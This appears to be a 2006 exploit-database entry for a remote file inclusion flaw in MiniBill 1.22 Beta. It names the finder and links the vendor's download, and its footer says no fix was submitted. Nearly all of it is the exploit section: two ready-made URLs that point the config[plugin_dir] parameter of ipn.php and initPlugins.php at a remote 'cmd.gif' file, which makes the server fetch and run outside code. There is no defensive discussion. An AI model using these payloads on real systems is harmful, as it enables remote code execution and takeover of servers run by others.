MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

2006-08-29 00:00:00

########################################################################
# MiniBill v1.22 Beta Remote File Inclusion Vulnerability
#
# Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip
#
# Found By: the master
#
########################################################################
# exploit:
#
#
http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif?
#
http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif?
########################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.